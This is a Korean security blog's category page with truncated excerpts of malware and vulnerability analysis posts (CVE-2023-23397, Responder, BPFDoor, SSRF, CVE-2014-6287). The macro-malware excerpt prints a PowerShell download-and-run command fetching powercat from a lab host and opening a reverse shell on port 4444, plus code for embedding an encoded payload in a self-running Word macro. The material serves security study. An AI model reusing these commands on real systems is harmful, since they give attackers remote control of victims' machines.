본문 바로가기

Tried. Failed. Logged.

728x90

🔒정보보안/악성코드 & 취약점 분석12

모든 인코딩 디코딩 문자 확인 사이트(dencode.com) https://dencode.com/ DenCode | Encoding & Decoding Online ToolsEncoding and Decoding site. e.g. HTML Escape / URL Encoding / Base64 / MD5 / SHA-1 / CRC32 / and many other String, Number, DateTime, Color, Hash formats!dencode.com 2025. 8. 5.

취약점 분석 - CVE-2023-23397 CVE-2023-23397 취약점 정보CVE-2023-23397는 Microsoft Windows 전용 Outlook에 약속을 알려주는 ‘미리 알림’ 기능에 재생할 사운드 파일을 불러오기 위해서 공격자의 SMB 서버로 인증하는 과정에 NTLM 자격 증명을 탈취되는 권한 상승 취약점입니다.해당 취약점을 이용하여 권한 상승이 이루어져 더 큰 피해가 발생할 수 있을 정도로 위험도는 다소 높을 것으로 예상됩니다.조치 방안으로 Outlook을 Build 16130.20306 이상으로 업데이트가 필요하며, SMB 서비스를 이용하지 않을 경우에는 해당 서비스를 비활성화 하거나 SMB TCP/445 포트 아웃바운드를 차단합니다.CVE Number CVE-2023-23397CVSS Score9.8severity(심각도).. 2025. 7. 27.

취약점 분석 - NTLM 크리덴셜 패킷 스니퍼 (responder.py) GitHub repohttps://github.com/SpiderLabs/Responder GitHub - SpiderLabs/Responder: Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue autheResponder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authenticat...github.com 사용 예시... 2025. 7. 27.

악성코드 분석 - 매크로 문서 악성 파일 IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.2/powercat.ps1');powercat -c 192.168.119.2 -p 4444 -e powershell str = "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGUAdwA..."n = 50for i in range(0, len(str), n): print("Str = Str + " + '"' + str[i:i+n] + '"')청크화(문자열이 너무 길면 오류가 발생) Sub AutoOpen() MyMacroEnd SubSub Document_Open() MyMacroEnd SubSub MyMacro() Di.. 2025. 7. 26.

악성코드 분석 - BPFDoor.c 주요 코드 분석 및 BPFDoor 진단 스크립트 제작 BPFDoor 오픈 소스 코드 https://github.com/gwillgues/BPFDoor/blob/main/bpfdoor.c BPFDoor/bpfdoor.c at main · gwillgues/BPFDoorBPFDoor Source Code. Originally found from Chinese Threat Actor Red Menshen - gwillgues/BPFDoorgithub.com RAW 소켓 통신[461] struct sock_fprog filter; struct sock_filter bpf_code[] = { { 0x28, 0, 0, 0x0000000c }, { 0x15, 0, 27, 0x00000800 }, .. 2025. 5. 13.

취약점 분석 - Blind SSRF with out-of-band detection(Burp Collaborator) Burp의 Collaborator을 이용하여, 타겟 서버의 SSRF에 취약한지 알아낼 수 있음 사용 예시)target.com에 request시 Refer, hosts, URL을 입력 받는 parameter 등에다 Collaborator에서 복사한 URL({random_strings}.oastify.com)을 넣고 요청, 이 때 Collaborator 탭에 반응이 올 경우 해당 웹 서버에 SSRF 취약점이 있음을 인지 (타겟 서버가 임의의 URL에다 요청을 하기 때문에, 만약 http://localhost/admin?changePassword=1234 같은 요청이 가능케해 정상적인 동작이 수행된다면 이는 SSRF에 취약) https://www.youtube.com/watch?v=-iNidz-O2FY h.. 2025. 1. 10.

취약점 분석 - SSL(TLS) 인증서 분석 도구(ssllabs, sslyze, sslscan) SSL 전버전 = 취약TLS 1.3 SSL Server Test https://www.ssllabs.com/ssltest/ SSL Server Test (Powered by Qualys SSL Labs)SSL Server Test This free online service performs a deep analysis of the configuration of any SSL web server on the public Internet. Please note that the information you submit here is used only to provide you the service. We don't use the domain names orwww.ssllabs.com Rank Chart .. 2024. 11. 26.

취약점 분석 - 프로세스 시작시 자동 디버깅 https://2ry53.tistory.com/entry/%ED%94%84%EB%A1%9C%EC%84%B8%EC%8A%A4-%EC%8B%9C%EC%9E%91%EC%8B%9C-%EC%9E%90%EB%8F%99-%EB%94%94%EB%B2%84%EA%B9%85 - 프로세스 시작시 자동 디버깅 -프로세스 시작과 동시에 디버깅을 해보자!! msdn에 가보면 이런글이 있었다. You can set up your application to start Visual Studio when you launch the application from Windows. Visual Studio will load your application, ready for deb2ry53.tistory.com 2024. 9. 10.

취약점 분석 - Living Off the Land (LOTL) Living Off the Land (LOTL) Living-off-the-land(리빙 오프 더 랜드) 기법은, 해커와 같은 공격자들이, 시스템에 이미 설치되어 있는 Tool을 사용해서 해킹 공격을 하는 기법을 의미 합니다. 즉 피해자 시스템에 기본으로 설치되어 있는 프로그램을 활용하여 해킹을 수행하기 때문에, AV(안티바이러스) Software 의 탐지를 피할 수 있다고 합니다. LoL Tool Living-off-the-land(LoL) 기법에서 사용하는 Tool을 LoL Tool 이라고 합니다. 공격자의 최종 Payload(악성코드)를 침투시키기 위한 침투 도구로 LoL(Living-off-the-land) Tool을 사용한다고 합니다. 즉 LoL Tool은 피해자의 시스템에 설치되어 악.. 2024. 4. 24.

취약점 분석 - 윈도우 워드프레스 공격 환경 구축 1. XAMPP(Apache, MariaDB, PHP 등) 설치 https://www.apachefriends.org/download.html Download XAMPPIncludes: Apache 2.4.56, MariaDB 10.4.28, PHP 8.0.28 & PEAR + SQLite 2.8.17/3.38.5 + multibyte (mbstring) support, Perl 5.34.1, ProFTPD 1.3.6, phpMyAdmin 5.2.1, OpenSSL 1.1.1t, GD 2.2.5, Freetype2 2.4.8, libpng 1.6.37, gdbm 1.8.3, zlib 1.2.11, expat 2.0.1,www.apachefriends.org 2. WordPress Release 다운로드 .. 2024. 3. 24.

취약점 분석 - Office 365(아웃룩) 버전 다운그레이드 1. 릴리스 목록 확인 https://learn.microsoft.com/ko-kr/officeupdates/update-history-microsoft365-apps-by-date?redirectSourcePath=%252fen-us%252farticle%252fae942449-1fca-4484-898b-a933ea23def7 Microsoft 365 앱의 업데이트 기록(날짜순) - Office release notes IT 전문가에게 릴리스 정보에 대한 링크와 함께 날짜별로 구성된 Microsoft 365 앱 릴리스의 전체 목록을 제공합니다. learn.microsoft.com 다운그레이드 원하는 버전의 빌드 버전 확인 ex) 17328.20184 2. cmd.exe(관리자 권한) 명령어 실행 cd .. 2024. 3. 16.

취약점 분석 - CVE-2014-6287, HFS(HTTP File Server) RCE 취약점 취약점 설명 parserLib.pas 라이브러리 파일에 내재되어 있는 findMacroMarker 함수가 %00(NULL) 값 이후에 오는 값을 읽어내지 못하여 파일 실행, 저장과 같은 매크로 명령어를 걸러내지 못하여 공격자가 원하는 행위가 가능한 취약점입니다. hfs2.3~hfs2.3c에 해당 CVE 취약점이 있습니다. *HFS(HTTP File Server) : HTTP 기반 파일 공유 서버 *스크립팅(매크로) 명령어 모음 : https://www.rejetto.com/wiki/index.php/HFS:_scripting_commands 코드 분석 // parserLib.pas function findMacroMarker(s:string; ofs:integer=1):integer; begin resu.. 2024. 1. 25.

이전 1 다음

728x90

티스토리툴바